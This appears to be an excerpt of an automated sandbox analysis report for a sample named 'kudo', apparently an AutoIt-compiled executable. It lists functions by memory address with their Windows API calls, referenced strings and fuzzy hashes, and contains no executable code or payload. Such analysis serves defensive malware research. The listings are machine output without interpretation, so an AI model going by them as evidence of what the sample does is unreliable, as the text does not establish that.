                                                      • Instruction ID: 945b645b9e53ab4bb5a7af16029f47db0024e0d0a5fa341816d304be5ec18887
                                                      • Opcode Fuzzy Hash: be743315e7ec26dd69aceecde3a8f9a2040b5d2d1348d332911388c373cb209b
                                                      • Instruction Fuzzy Hash: 8C31D531A007099FEB24CF58DC45FAEBFB4FF85350F1900A9E985E61A1DB709984CB51
                                                      APIs
                                                      • __snwprintf.LIBCMT ref: 00873A66
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: __snwprintf_memmove
                                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                                      • API String ID: 3506404897-2584243854
                                                      • Opcode ID: 2a1d3ccdcae7a34766ba334eebb96490abdc1512de5510f71218a489c72b25bf
                                                      • Instruction ID: c5fbaab827b3009dc0cf43dafc99e417580f5aec6110ac84a21149813f8ccdfe
                                                      • Opcode Fuzzy Hash: 2a1d3ccdcae7a34766ba334eebb96490abdc1512de5510f71218a489c72b25bf
                                                      • Instruction Fuzzy Hash: 0C218471A00529AFCF50EF68CC82AAEB7B9FF44300F404454E559E7285DB34EA45DB66
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00886761
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0088676C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: Combobox
                                                      • API String ID: 3850602802-2096851135
                                                      • Opcode ID: 2af0c6088f5d52e1abc1e7483ae3206f613dc6ce5aebf1507dd96dcbbd82ed58
                                                      • Instruction ID: 15d8b172d727545093224aeeaa99ad41918be228c7e809af0b74abbfab47d176
                                                      • Opcode Fuzzy Hash: 2af0c6088f5d52e1abc1e7483ae3206f613dc6ce5aebf1507dd96dcbbd82ed58
                                                      • Instruction Fuzzy Hash: E3118275200208AFEF21EF58DC81EBB376AFB98368F104229F914D7290E6759C6187A0
                                                      APIs
                                                        • Part of subcall function 00801D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00801D73
                                                        • Part of subcall function 00801D35: GetStockObject.GDI32(00000011), ref: 00801D87
                                                        • Part of subcall function 00801D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00801D91
                                                      • GetWindowRect.USER32(00000000,?), ref: 00886C71
                                                      • GetSysColor.USER32(00000012), ref: 00886C8B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                      • String ID: static
                                                      • API String ID: 1983116058-2160076837
                                                      • Opcode ID: b5d995db997e330eabbbf00b8fc4a75482aee9312393d079f7a0c5a190fe698e
                                                      • Instruction ID: 1107178e453b86fc60d311f446bf538c4156e74682ddfbf771987c39d0d6b5ab
                                                      • Opcode Fuzzy Hash: b5d995db997e330eabbbf00b8fc4a75482aee9312393d079f7a0c5a190fe698e
                                                      • Instruction Fuzzy Hash: D7212C72510209AFDF04DFA8CC45EFA7BB9FB08315F004629FE55D2251E635E860DB60
                                                      APIs
                                                      • GetWindowTextLengthW.USER32(00000000), ref: 008869A2
                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008869B1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: LengthMessageSendTextWindow
                                                      • String ID: edit
                                                      • API String ID: 2978978980-2167791130
                                                      • Opcode ID: 2845d51f1e49105b502820653306b5b8e9c7b26da24303d012891e9c357aa8be
                                                      • Instruction ID: 31e41c436ff2208f8e2bf5fb96bbeafddd3375781bd5bd962ca3b7f169b41173
                                                      • Opcode Fuzzy Hash: 2845d51f1e49105b502820653306b5b8e9c7b26da24303d012891e9c357aa8be
                                                      • Instruction Fuzzy Hash: 17116D71110109ABEF10AE789C45AAB3BA9FB05378F604724FAA5D61E0E631DCA19760
                                                      APIs
                                                      • _memset.LIBCMT ref: 00862A22
                                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00862A41
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: InfoItemMenu_memset
                                                      • String ID: 0
                                                      • API String ID: 2223754486-4108050209
                                                      • Opcode ID: e723ddb1fc5dd561900e81fb6b5a4131e89c9a4d237017242f8d6ccba93dfb15
                                                      • Instruction ID: 46ec6db68fa4a78ea3f3367f1aab674752d3991eca19be30b84611c36ee0e4ab
                                                      • Opcode Fuzzy Hash: e723ddb1fc5dd561900e81fb6b5a4131e89c9a4d237017242f8d6ccba93dfb15
                                                      • Instruction Fuzzy Hash: 5311BE32901928ABCF32DADCD844FEA77B9FB45315F0640A1E995F7290D7B0AD0AC791
                                                      APIs
                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0087222C
                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00872255
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Internet$OpenOption
                                                      • String ID: <local>
                                                      • API String ID: 942729171-4266983199
                                                      • Opcode ID: 5b73cb5e25a93eb767afe9fa41986ade5b3d8f1bcde30b86554af83c70fd805d
                                                      • Instruction ID: b33e5d08903113da7b63970423af129978f3aa2c42c22ba22095df78d5938e7f
                                                      • Opcode Fuzzy Hash: 5b73cb5e25a93eb767afe9fa41986ade5b3d8f1bcde30b86554af83c70fd805d
                                                      • Instruction Fuzzy Hash: 0011E070511225BADB248F158C84EBBFBA8FF0A355F10C22AFA28C6101D270E990D6F0
                                                      APIs
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                        • Part of subcall function 0085AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0085AABC
                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00858E73
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: 53113041d7211fde1b9149a4a0e37368e38c34ddfe708de08ccce92840dbcf4d
                                                      • Instruction ID: e773fe5065edadea0a259f61bbd1b943a1051c5f8fe9bdab1bf94eea36c6ac39
                                                      • Opcode Fuzzy Hash: 53113041d7211fde1b9149a4a0e37368e38c34ddfe708de08ccce92840dbcf4d
                                                      • Instruction Fuzzy Hash: 69019271A01229ABCB15EBA8CC568FE7769FF46320B540A1AFC35E73D1EE35580CC661
                                                      APIs
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                        • Part of subcall function 0085AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0085AABC
                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00858D6B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: 8f7d38fc94be1d01e8560514806331cd2497f4b6178267d3ee7e47745c0f6d10
                                                      • Instruction ID: ee137e3bb6b21752acffe6c2947d498fcbae0b508b970491c729687f76e0de8d
                                                      • Opcode Fuzzy Hash: 8f7d38fc94be1d01e8560514806331cd2497f4b6178267d3ee7e47745c0f6d10
                                                      • Instruction Fuzzy Hash: 5001B171A41108ABDF15EBA4CD52AFE77A8FF15341F10002ABD15F72D1DE245A0CD672
                                                      APIs
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                        • Part of subcall function 0085AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0085AABC
                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00858DEE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: ec0729d1938823f53c240df483b89846ca54b7420ab7d35dbbc01bef1a1724f8
                                                      • Instruction ID: edeb968316e95ccc5a150f745f1d15e6416d3ea101c20bbe823064bf329e0a22
                                                      • Opcode Fuzzy Hash: ec0729d1938823f53c240df483b89846ca54b7420ab7d35dbbc01bef1a1724f8
                                                      • Instruction Fuzzy Hash: 77018F71A41109ABDB15EAA8CD82AFE77A8FB11301F100126BC15F32D2DA255E0CD672
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ClassName_wcscmp
                                                      • String ID: #32770
                                                      • API String ID: 2292705959-463685578
                                                      • Opcode ID: 72df19c92063555bfc75f9bdc3637129d8e829694ceda0b1a8fe24e33ac9db10
                                                      • Instruction ID: 394378f56aced29eb3deedefa220b85e4f4d91fbbf3c6f77dcf07d96c6bba294
                                                      • Opcode Fuzzy Hash: 72df19c92063555bfc75f9bdc3637129d8e829694ceda0b1a8fe24e33ac9db10
                                                      • Instruction Fuzzy Hash: A8E0D8326002386BE720AB99AC49FA7F7ACFB55B70F110067FD04D3151E970AA55CBE1
                                                      APIs
                                                        • Part of subcall function 0083B314: _memset.LIBCMT ref: 0083B321
                                                        • Part of subcall function 00820940: InitializeCriticalSectionAndSpinCount.KERNEL32(008C4158,00000000,008C4144,0083B2F0,?,?,?,0080100A), ref: 00820945
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,0080100A), ref: 0083B2F4
                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0080100A), ref: 0083B303
                                                      Strings
                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0083B2FE
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                      • API String ID: 3158253471-631824599
                                                      • Opcode ID: 08a7f7f38d06424827b909911407464b84e69f28d59d7b6b0fd7e879ff1fe70e
                                                      • Instruction ID: f60e9e34e428cd3605b796f1d2e423cd8d998e84c9b6fa09494f00444163a086
                                                      • Opcode Fuzzy Hash: 08a7f7f38d06424827b909911407464b84e69f28d59d7b6b0fd7e879ff1fe70e
                                                      • Instruction Fuzzy Hash: 53E06DB02007218BE760EF6CE8047427AE4FF40304F00892CE656C7742EBB4E488CBA1
                                                      APIs
                                                      • GetSystemDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00841775
                                                        • Part of subcall function 0087BFF0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 0087BFFE
                                                        • Part of subcall function 0087BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW,?,0084195E,?), ref: 0087C010
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0084196D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                      • String ID: WIN_XPe
                                                      • API String ID: 582185067-3257408948
                                                      • Opcode ID: c16f021edc6bb5da019fcf3b98605715d338468630bbbd94149e8f16f4718165
                                                      • Instruction ID: 3285f1c3a59126b879a2fe72e0991b79f810a0d7a3d5537af48884ec861b28ef
                                                      • Opcode Fuzzy Hash: c16f021edc6bb5da019fcf3b98605715d338468630bbbd94149e8f16f4718165
                                                      • Instruction Fuzzy Hash: 18F01E7080100CEFCB25DBA4C988AECBBB8FB08304F600095E112E20A5DB319E84CF24
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008859AE
                                                      • PostMessageW.USER32(00000000), ref: 008859B5
                                                        • Part of subcall function 00865244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008652BC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: 7cdb5b18e65eec6e3d252d7d169bb26fe30aa7207673c262dfee646c29d8ba39
                                                      • Instruction ID: cd49a699953ea6f08209209bcaa5fd7e877a2ee0ceba2943a063f07a9da2a45b
                                                      • Opcode Fuzzy Hash: 7cdb5b18e65eec6e3d252d7d169bb26fe30aa7207673c262dfee646c29d8ba39
                                                      • Instruction Fuzzy Hash: 9AD0C931380311BAE6A4BB74DC0BFD76614FB14B50F010825B355EA2D1D9E4A800CB54
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0088596E
                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00885981
                                                        • Part of subcall function 00865244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008652BC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: bd08d4642b8e729353fe22367c80256f2708fd50546625b52efa7250f7191301
                                                      • Instruction ID: 0212e04a047e314a3e190338392c3cf6bb2ddc0ba099a2a30cbd636c089ff491
                                                      • Opcode Fuzzy Hash: bd08d4642b8e729353fe22367c80256f2708fd50546625b52efa7250f7191301
                                                      • Instruction Fuzzy Hash: 06D0C931384311B6E6A4BB74DC1BFD76A14FB10B50F010825B359EA2D1D9E4A800CB54
